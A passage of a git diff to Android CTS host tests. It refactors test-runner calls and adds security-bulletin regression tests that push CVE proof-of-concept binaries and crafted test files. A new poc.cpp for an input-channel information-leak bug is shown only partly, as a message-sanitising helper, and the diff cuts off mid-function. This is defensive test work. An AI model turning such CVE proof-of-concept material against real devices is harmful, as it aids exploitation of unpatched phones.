- Utils.runDeviceTestsAsCurrentUser(getDevice(), TINY_PKG,
+ Utils.runDeviceTests(getDevice(), TINY_PKG,
".PackageResolutionTest", "queryActivityOrdered");
getDevice().uninstallPackage(TINY_PKG);
}
@@ -66,7 +65,7 @@
@AppModeFull // TODO: Needs porting to instant
public void testResolveOrderedService() throws Exception {
getDevice().installPackage(mBuildHelper.getTestFile(TINY_APK), true);
- Utils.runDeviceTestsAsCurrentUser(getDevice(), TINY_PKG,
+ Utils.runDeviceTests(getDevice(), TINY_PKG,
".PackageResolutionTest", "queryServiceOrdered");
getDevice().uninstallPackage(TINY_PKG);
}
@@ -75,7 +74,7 @@
@AppModeFull // TODO: Needs porting to instant
public void testResolveOrderedReceiver() throws Exception {
getDevice().installPackage(mBuildHelper.getTestFile(TINY_APK), true);
- Utils.runDeviceTestsAsCurrentUser(getDevice(), TINY_PKG,
+ Utils.runDeviceTests(getDevice(), TINY_PKG,
".PackageResolutionTest", "queryReceiverOrdered");
getDevice().uninstallPackage(TINY_PKG);
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
index e04bf0a..3d270b90 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
@@ -403,6 +403,6 @@
private void runDeviceTests(String packageName, String testClassName, String testMethodName)
throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, testClassName, testMethodName);
+ Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
}
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/SplitTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/SplitTests.java
index 0884818..f8841cb 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/SplitTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/SplitTests.java
@@ -127,7 +127,7 @@
private void testSingleBase(boolean instant) throws Exception {
new InstallMultiple().addApk(APK)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testSingleBase");
+ runDeviceTests(PKG, CLASS, "testSingleBase");
}
@AppModeInstant
@@ -143,7 +143,7 @@
private void testDensitySingle(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_mdpi)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testDensitySingle");
+ runDeviceTests(PKG, CLASS, "testDensitySingle");
}
@AppModeInstant
@@ -159,7 +159,7 @@
private void testDensityAll(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_mdpi).addApk(APK_hdpi).addApk(APK_xhdpi)
.addApk(APK_xxhdpi).addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testDensityAll");
+ runDeviceTests(PKG, CLASS, "testDensityAll");
}
/**
@@ -183,12 +183,12 @@
private void testDensityBest(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_mdpi)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testDensityBest1");
+ runDeviceTests(PKG, CLASS, "testDensityBest1");
// Now splice in an additional split which offers better resources
new InstallMultiple().inheritFrom(PKG).addApk(APK_xxhdpi)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testDensityBest2");
+ runDeviceTests(PKG, CLASS, "testDensityBest2");
}
/**
@@ -212,7 +212,7 @@
private void testApi(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_v7)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testApi");
+ runDeviceTests(PKG, CLASS, "testApi");
}
@AppModeInstant
@@ -228,7 +228,7 @@
private void testLocale(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_de).addApk(APK_fr)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testLocale");
+ runDeviceTests(PKG, CLASS, "testLocale");
}
/**
@@ -256,7 +256,7 @@
new InstallMultiple().addApk(APK).addApk(apk)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testNative");
+ runDeviceTests(PKG, CLASS, "testNative");
}
/**
@@ -288,7 +288,7 @@
new InstallMultiple().useNaturalAbi().addApk(APK).addApk(apk)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testNative");
+ runDeviceTests(PKG, CLASS, "testNative");
}
/**
@@ -343,7 +343,7 @@
inst.useNaturalAbi();
}
inst.run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testNative");
+ runDeviceTests(PKG, CLASS, "testNative");
}
@AppModeInstant
@@ -451,7 +451,7 @@
private void testDiffRevision(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_DIFF_REVISION_v7)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testRevision0_12");
+ runDeviceTests(PKG, CLASS, "testRevision0_12");
}
@AppModeInstant
@@ -467,10 +467,10 @@
private void testDiffRevisionInheritBase(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_v7)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testRevision0_0");
+ runDeviceTests(PKG, CLASS, "testRevision0_0");
new InstallMultiple().inheritFrom(PKG).addApk(APK_DIFF_REVISION_v7)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testRevision0_12");
+ runDeviceTests(PKG, CLASS, "testRevision0_12");
}
@AppModeInstant
@@ -486,10 +486,10 @@
private void testDiffRevisionInheritSplit(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_v7)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testRevision0_0");
+ runDeviceTests(PKG, CLASS, "testRevision0_0");
new InstallMultiple().inheritFrom(PKG).addApk(APK_DIFF_REVISION)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testRevision12_0");
+ runDeviceTests(PKG, CLASS, "testRevision12_0");
}
@AppModeInstant
@@ -522,7 +522,7 @@
private void testFeatureBase(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_FEATURE)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testFeatureBase");
+ runDeviceTests(PKG, CLASS, "testFeatureBase");
}
@AppModeInstant
@@ -538,7 +538,7 @@
private void testFeatureApiInstant(boolean instant) throws Exception {
new InstallMultiple().addApk(APK).addApk(APK_FEATURE).addApk(APK_FEATURE_v7)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testFeatureApi");
+ runDeviceTests(PKG, CLASS, "testFeatureApi");
}
@AppModeFull
@@ -571,10 +571,10 @@
if (instant) {
// Poke the full app so it can see the instant app.
- runDeviceTestsAsCurrentUser(PKG_NO_RESTART, CLASS_NO_RESTART, "testPokeFullApp");
+ runDeviceTests(PKG_NO_RESTART, CLASS_NO_RESTART, "testPokeFullApp");
}
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testBaseInstalled");
+ runDeviceTests(PKG, CLASS, "testBaseInstalled");
new InstallMultiple()
.addArg(instant ? "--instant" : "")
@@ -582,7 +582,7 @@
.inheritFrom(PKG_NO_RESTART)
.addApk(APK_NO_RESTART_FEATURE)
.run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testFeatureInstalled");
+ runDeviceTests(PKG, CLASS, "testFeatureInstalled");
}
/**
@@ -604,10 +604,10 @@
private void testClearCodeCache(boolean instant) throws Exception {
new InstallMultiple().addApk(APK)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testCodeCacheWrite");
+ runDeviceTests(PKG, CLASS, "testCodeCacheWrite");
new InstallMultiple().addArg("-r").addApk(APK_DIFF_VERSION)
.addArg(instant ? "--instant" : "").run();
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testCodeCacheRead");
+ runDeviceTests(PKG, CLASS, "testCodeCacheRead");
}
private class InstallMultiple extends BaseInstallMultiple<InstallMultiple> {
@@ -616,9 +616,8 @@
}
}
- public void runDeviceTestsAsCurrentUser(
- String packageName, String testClassName, String testMethodName)
- throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, testClassName, testMethodName);
+ public void runDeviceTests(String packageName, String testClassName, String testMethodName)
+ throws DeviceNotAvailableException {
+ Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
}
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/UsesLibraryHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/UsesLibraryHostTest.java
index 7ac3efb..a8c3dd9 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/UsesLibraryHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/UsesLibraryHostTest.java
@@ -69,22 +69,21 @@
public void testUsesLibrary() throws Exception {
assertNull(getDevice().installPackage(mBuildHelper.getTestFile(APK), false, false));
- runDeviceTestsAsCurrentUser(PKG, ".UsesLibraryTest", "testUsesLibrary");
+ runDeviceTests(PKG, ".UsesLibraryTest", "testUsesLibrary");
}
public void testMissingLibrary() throws Exception {
assertNull(getDevice().installPackage(mBuildHelper.getTestFile(APK), false, false));
- runDeviceTestsAsCurrentUser(PKG, ".UsesLibraryTest", "testMissingLibrary");
+ runDeviceTests(PKG, ".UsesLibraryTest", "testMissingLibrary");
}
public void testDuplicateLibrary() throws Exception {
assertNull(getDevice().installPackage(mBuildHelper.getTestFile(APK), false, false));
- runDeviceTestsAsCurrentUser(PKG, ".UsesLibraryTest", "testDuplicateLibrary");
+ runDeviceTests(PKG, ".UsesLibraryTest", "testDuplicateLibrary");
}
- private void runDeviceTestsAsCurrentUser(
- String packageName, String testClassName, String testMethodName)
- throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, testClassName, testMethodName);
+ private void runDeviceTests(String packageName, String testClassName, String testMethodName)
+ throws DeviceNotAvailableException {
+ Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
}
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/Utils.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/Utils.java
index f39a537..c63720f 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/Utils.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/Utils.java
@@ -32,19 +32,6 @@
public class Utils {
public static final int USER_SYSTEM = 0;
- public static void runDeviceTestsAsCurrentUser(ITestDevice device, String packageName,
- String testClassName, String testMethodName) throws DeviceNotAvailableException {
- runDeviceTests(device, packageName, testClassName, testMethodName, device.getCurrentUser(),
- null);
- }
-
- public static void runDeviceTestsAsCurrentUser(ITestDevice device, String packageName,
- String testClassName, String testMethodName, Map<String, String> testArgs)
- throws DeviceNotAvailableException {
- runDeviceTests(device, packageName, testClassName, testMethodName, device.getCurrentUser(),
- testArgs);
- }
-
public static void runDeviceTests(ITestDevice device, String packageName, String testClassName,
String testMethodName) throws DeviceNotAvailableException {
runDeviceTests(device, packageName, testClassName, testMethodName, USER_SYSTEM, null);
@@ -140,11 +127,10 @@
public static int[] prepareMultipleUsers(ITestDevice device, int maxUsers)
throws DeviceNotAvailableException {
final int[] userIds = getAllUsers(device);
- int currentUserId = device.getCurrentUser();
for (int i = 1; i < userIds.length; i++) {
if (i < maxUsers) {
device.startUser(userIds[i]);
- } else if (userIds[i] != currentUserId) {
+ } else {
device.stopUser(userIds[i]);
}
}
diff --git a/hostsidetests/appsecurity/test-apps/EncryptionApp/src/com/android/cts/encryptionapp/EncryptionAppTest.java b/hostsidetests/appsecurity/test-apps/EncryptionApp/src/com/android/cts/encryptionapp/EncryptionAppTest.java
index 38cdb3c..1d0f83e 100644
--- a/hostsidetests/appsecurity/test-apps/EncryptionApp/src/com/android/cts/encryptionapp/EncryptionAppTest.java
+++ b/hostsidetests/appsecurity/test-apps/EncryptionApp/src/com/android/cts/encryptionapp/EncryptionAppTest.java
@@ -19,7 +19,6 @@
import static android.content.pm.PackageManager.MATCH_DIRECT_BOOT_AWARE;
import static android.content.pm.PackageManager.MATCH_DIRECT_BOOT_UNAWARE;
-import android.app.KeyguardManager;
import android.content.BroadcastReceiver;
import android.content.ComponentName;
import android.content.Context;
@@ -57,7 +56,6 @@
private Context mCe;
private Context mDe;
private PackageManager mPm;
- private KeyguardManager mKm;
private UiDevice mDevice;
private AwareActivity mActivity;
@@ -69,7 +67,6 @@
mCe = getInstrumentation().getContext();
mDe = mCe.createDeviceProtectedStorageContext();
mPm = mCe.getPackageManager();
- mKm = (KeyguardManager) mCe.getSystemService(Context.KEYGUARD_SERVICE);
mDevice = UiDevice.getInstance(getInstrumentation());
assertNotNull(mDevice);
@@ -103,9 +100,7 @@
public void testTearDown() throws Exception {
// Just in case, always try tearing down keyguard
- if (mKm.isKeyguardLocked()) {
- dismissKeyguard();
- }
+ dismissKeyguard();
mActivity = launchActivity(getInstrumentation().getTargetContext().getPackageName(),
AwareActivity.class, null);
diff --git a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/src/com/android/cts/normalapp/ClientTest.java b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/src/com/android/cts/normalapp/ClientTest.java
index 48a1b5d..2265dec 100644
--- a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/src/com/android/cts/normalapp/ClientTest.java
+++ b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/src/com/android/cts/normalapp/ClientTest.java
@@ -441,10 +441,6 @@
final int originalSetting = Secure.getInt(contentResolver, Secure.INSTANT_APPS_ENABLED, 1);
Secure.putInt(contentResolver, Secure.INSTANT_APPS_ENABLED, 0);
try {
- Thread.sleep(1000);
- } catch (Exception e) {
- }
- try {
// start the ephemeral activity; using VIEW/BROWSABLE with setting disabled
try {
final Intent startViewIntent = new Intent(Intent.ACTION_VIEW)
diff --git a/hostsidetests/backup/AndroidTest.xml b/hostsidetests/backup/AndroidTest.xml
index b78cd07..868e20f 100644
--- a/hostsidetests/backup/AndroidTest.xml
+++ b/hostsidetests/backup/AndroidTest.xml
@@ -16,9 +16,6 @@
<configuration description="Config for CTS Backup host test cases">
<option name="test-suite-tag" value="cts" />
<option name="config-descriptor:metadata" key="component" value="backup" />
- <target_preparer class="com.android.tradefed.targetprep.SwitchUserTargetPreparer">
- <option name="user-type" value="system" />
- </target_preparer>
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
<option name="test-file-name" value="CtsFullbackupApp.apk" />
diff --git a/hostsidetests/devicepolicy/app/DeviceOwner/src/com/android/cts/deviceowner/CreateAndManageUserTest.java b/hostsidetests/devicepolicy/app/DeviceOwner/src/com/android/cts/deviceowner/CreateAndManageUserTest.java
old mode 100755
new mode 100644
index 0280bdf..bbe6855
--- a/hostsidetests/devicepolicy/app/DeviceOwner/src/com/android/cts/deviceowner/CreateAndManageUserTest.java
+++ b/hostsidetests/devicepolicy/app/DeviceOwner/src/com/android/cts/deviceowner/CreateAndManageUserTest.java
@@ -379,8 +379,6 @@
localBroadcastManager.registerReceiver(broadcastReceiver,
new IntentFilter(BasicAdminReceiver.ACTION_USER_STOPPED));
- Thread.sleep(USER_SWITCH_DELAY);
-
try {
assertEquals(UserManager.USER_OPERATION_SUCCESS,
mDevicePolicyManager.stopUser(getWho(), userHandle));
@@ -411,13 +409,8 @@
LocalBroadcastReceiver broadcastReceiver = new LocalBroadcastReceiver();
localBroadcastManager.registerReceiver(broadcastReceiver,
- new IntentFilter(BasicAdminReceiver.ACTION_USER_STARTED));
- broadcastReceiver.waitForBroadcastReceived();
- localBroadcastManager.unregisterReceiver(broadcastReceiver);
-
- // Register broadcast receiver for the remove action.
- localBroadcastManager.registerReceiver(broadcastReceiver,
new IntentFilter(BasicAdminReceiver.ACTION_USER_REMOVED));
+
try {
assertEquals(UserManager.USER_OPERATION_SUCCESS,
mDevicePolicyManager.stopUser(getWho(), userHandle));
diff --git a/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk b/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk
index be9a7fc..60395c2 100644
--- a/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk
+++ b/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk
@@ -28,8 +28,7 @@
LOCAL_STATIC_JAVA_LIBRARIES := \
androidx.legacy_legacy-support-v4 \
- ctstestrunner \
- compatibility-device-util
+ ctstestrunner
LOCAL_SDK_VERSION := current
diff --git a/hostsidetests/devicepolicy/app/IntentReceiver/src/com/android/cts/intent/receiver/OwnerChangedBroadcastTest.java b/hostsidetests/devicepolicy/app/IntentReceiver/src/com/android/cts/intent/receiver/OwnerChangedBroadcastTest.java
index 5e4fb07..f305e86 100644
--- a/hostsidetests/devicepolicy/app/IntentReceiver/src/com/android/cts/intent/receiver/OwnerChangedBroadcastTest.java
+++ b/hostsidetests/devicepolicy/app/IntentReceiver/src/com/android/cts/intent/receiver/OwnerChangedBroadcastTest.java
@@ -23,8 +23,6 @@
import android.content.SharedPreferences.OnSharedPreferenceChangeListener;
import android.test.InstrumentationTestCase;
-import com.android.compatibility.common.util.CddTest;
-
import java.util.concurrent.Semaphore;
import java.util.concurrent.TimeUnit;
import java.lang.InterruptedException;
@@ -44,7 +42,6 @@
// We can't just register a broadcast receiver in the code because the broadcast
// may have been sent before this test is run. So we have a manifest receiver
// listening to the broadcast and writing to a shared preference when it receives it.
- @CddTest(requirement="3.2.3.4/C-0-1")
public void testOwnerChangedBroadcastReceived() throws InterruptedException {
final Semaphore mPreferenceChanged = new Semaphore(0);
diff --git a/hostsidetests/devicepolicy/app/SimpleApp/src/com/android/cts/launcherapps/simpleapp/SimpleService.java b/hostsidetests/devicepolicy/app/SimpleApp/src/com/android/cts/launcherapps/simpleapp/SimpleService.java
index 67fa271..7c7f94b 100644
--- a/hostsidetests/devicepolicy/app/SimpleApp/src/com/android/cts/launcherapps/simpleapp/SimpleService.java
+++ b/hostsidetests/devicepolicy/app/SimpleApp/src/com/android/cts/launcherapps/simpleapp/SimpleService.java
@@ -23,9 +23,7 @@
import android.app.Service;
import android.content.Intent;
import android.os.Binder;
-import android.os.Handler;
import android.os.IBinder;
-import android.os.Looper;
import android.os.Parcel;
import android.os.Process;
import android.os.RemoteException;
@@ -45,9 +43,7 @@
throws RemoteException {
switch (code) {
case FIRST_CALL_TRANSACTION:
- new Handler(Looper.getMainLooper()).post( () -> {
- Process.killProcess(Process.myPid());
- });
+ Process.killProcess(Process.myPid());
return true;
}
return super.onTransact(code, data, reply, flags);
diff --git a/hostsidetests/security/Android.mk b/hostsidetests/security/Android.mk
index cdf71dc..8bef613 100644
--- a/hostsidetests/security/Android.mk
+++ b/hostsidetests/security/Android.mk
@@ -21,7 +21,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityHostTestCases
diff --git a/hostsidetests/security/src/android/security/cts/KernelConfigTest.java b/hostsidetests/security/src/android/security/cts/KernelConfigTest.java
index 96cd045..bec7a9c 100644
--- a/hostsidetests/security/src/android/security/cts/KernelConfigTest.java
+++ b/hostsidetests/security/src/android/security/cts/KernelConfigTest.java
@@ -108,11 +108,10 @@
*
* @throws Exception
*/
- @CddTest(requirement="9.7/C-0-7")
+ @CddTest(requirement="9.7")
public void testConfigStackProtectorStrong() throws Exception {
assertTrue("Linux kernel must have Stack Protector enabled: " +
- "CONFIG_STACKPROTECTOR_STRONG=y or CONFIG_CC_STACKPROTECTOR_STRONG=y",
- configSet.contains("CONFIG_STACKPROTECTOR_STRONG=y") ||
+ "CONFIG_CC_STACKPROTECTOR_STRONG=y",
configSet.contains("CONFIG_CC_STACKPROTECTOR_STRONG=y"));
}
@@ -122,7 +121,7 @@
*
* @throws Exception
*/
- @CddTest(requirement="9.7/C-0-8")
+ @CddTest(requirement="9.7")
public void testConfigROData() throws Exception {
if (configSet.contains("CONFIG_UH_RKP=y"))
return;
diff --git a/hostsidetests/securitybulletin/Android.mk b/hostsidetests/securitybulletin/Android.mk
index a07fbbd..fc814a5 100644
--- a/hostsidetests/securitybulletin/Android.mk
+++ b/hostsidetests/securitybulletin/Android.mk
@@ -23,7 +23,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityBulletinHostTestCases
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 8014243..11683fc 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -39,6 +39,7 @@
<!-- Bulletin 2016-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-2412->/data/local/tmp/CVE-2016-2412" />
<option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
<option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
@@ -46,6 +47,11 @@
<!-- Bulletin 2016-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-2460->/data/local/tmp/CVE-2016-2460" />
+ <option name="push" value="CVE-2015-1805->/data/local/tmp/CVE-2015-1805" />
+
+ <!--__________________-->
+ <!-- Bulletin 2016-06 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<!--__________________-->
<!-- Bulletin 2016-07 -->
@@ -63,6 +69,7 @@
<!--__________________-->
<!-- Bulletin 2016-11 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2012-6702->/data/local/tmp/CVE-2012-6702" />
<!--__________________-->
<!-- Bulletin 2016-12 -->
@@ -75,11 +82,13 @@
<!--__________________-->
<!-- Bulletin 2017-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0415->/data/local/tmp/CVE-2017-0415" />
<option name="push" value="CVE-2017-0426->/data/local/tmp/CVE-2017-0426" />
<!--__________________-->
<!-- Bulletin 2017-03 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0477->/data/local/tmp/CVE-2017-0477" />
<option name="push" value="CVE-2017-0479->/data/local/tmp/CVE-2017-0479" />
<option name="push" value="CVE-2017-0334->/data/local/tmp/CVE-2017-0334" />
<option name="push" value="CVE-2016-8479->/data/local/tmp/CVE-2016-8479" />
@@ -135,6 +144,7 @@
<!--__________________-->
<!-- Bulletin 2018-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
<option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
<!--__________________-->
@@ -142,11 +152,37 @@
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2017-13253->/data/local/tmp/CVE-2017-13253" />
+ <!--__________________-->
+ <!-- Bulletin 2018-07 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
+
+ <!--__________________-->
+ <!-- Bulletin 2018-10 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-9490->/data/local/tmp/CVE-2018-9490" />
+ <option name="push" value="CVE-2018-9515->/data/local/tmp/CVE-2018-9515" />
+
+ <!--__________________-->
+ <!-- Bulletin 2019-03 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="Bug-115739809->/data/local/tmp/Bug-115739809" />
+
<option name="append-bitness" value="true" />
</target_preparer>
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsHostLaunchAnyWhereApp.apk" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="OomCatcher.apk" />
+ </target_preparer>
+
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityBulletinHostTestCases.jar" />
- <option name="runtime-hint" value="8m40s" />
+ <option name="runtime-hint" value="18m26s" />
</test>
</configuration>
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0477.gif b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
new file mode 100644
index 0000000..67bd51f
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0647.zip b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
new file mode 100644
index 0000000..e01eaf4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/Bug-115739809/Android.mk b/hostsidetests/securitybulletin/securityPatch/Bug-115739809/Android.mk
new file mode 100755
index 0000000..cd2dbcd
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/Bug-115739809/Android.mk
@@ -0,0 +1,38 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-115739809
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_SHARED_LIBRARIES := \
+ libbase \
+ libinput \
+ libutils \
+ liblog
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS += -Wall -Werror -Wextra
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/Bug-115739809/poc.cpp b/hostsidetests/securitybulletin/securityPatch/Bug-115739809/poc.cpp
new file mode 100755
index 0000000..54e70cb1
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/Bug-115739809/poc.cpp
@@ -0,0 +1,209 @@
+/**
+* Copyright (C) 2018 The Android Open Source Project
+*
+* Licensed under the Apache License, Version 2.0 (the "License");
+* you may not use this file except in compliance with the License.
+* You may obtain a copy of the License at
+*
+* http://www.apache.org/licenses/LICENSE-2.0
+*
+* Unless required by applicable law or agreed to in writing, software
+* distributed under the License is distributed on an "AS IS" BASIS,
+* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+* See the License for the specific language governing permissions and
+* limitations under the License.
+*/
+
+#define LOG_TAG "InputChannelTest"
+
+#include "../includes/common.h"
+
+#include <android-base/stringprintf.h>
+#include <input/InputTransport.h>
+
+using namespace android;
+using android::base::StringPrintf;
+
+static std::string memoryAsHexString(const void* const address, size_t numBytes) {
+ std::string str;
+ for (size_t i = 0; i < numBytes; i++) {
+ str += StringPrintf("%02X ", static_cast<const uint8_t* const>(address)[i]);
+ }
+ return str;
+}
+
+/**
+ * There could be non-zero bytes in-between InputMessage fields. Force-initialize the entire
+ * memory to zero, then only copy the valid bytes on a per-field basis.
+ * Input: message msg
+ * Output: cleaned message outMsg
+ */
+static void sanitizeMessage(const InputMessage& msg, InputMessage* outMsg) {
+ memset(outMsg, 0, sizeof(*outMsg));
+
+ // Write the header
+ outMsg->header.type = msg.header.type;
+
+ // Write the body
+ switch(msg.header.type) {
+ case InputMessage::TYPE_KEY: {
+ // uint32_t seq
+ outMsg->body.key.seq = msg.body.key.seq;
+ // nsecs_t eventTime
+ outMsg->body.key.eventTime = msg.body.key.eventTime;
+ // int32_t deviceId
+ outMsg->body.key.deviceId = msg.body.key.deviceId;
+ // int32_t source
+ outMsg->body.key.source = msg.body.key.source;
+ // int32_t displayId
+ outMsg->body.key.displayId = msg.body.key.displayId;
+ // int32_t action
+ outMsg->body.key.action = msg.body.key.action;
+ // int32_t flags
+ outMsg->body.key.flags = msg.body.key.flags;
+ // int32_t keyCode
+ outMsg->body.key.keyCode = msg.body.key.keyCode;
+ // int32_t scanCode
+ outMsg->body.key.scanCode = msg.body.key.scanCode;
+ // int32_t metaState
+ outMsg->body.key.metaState = msg.body.key.metaState;
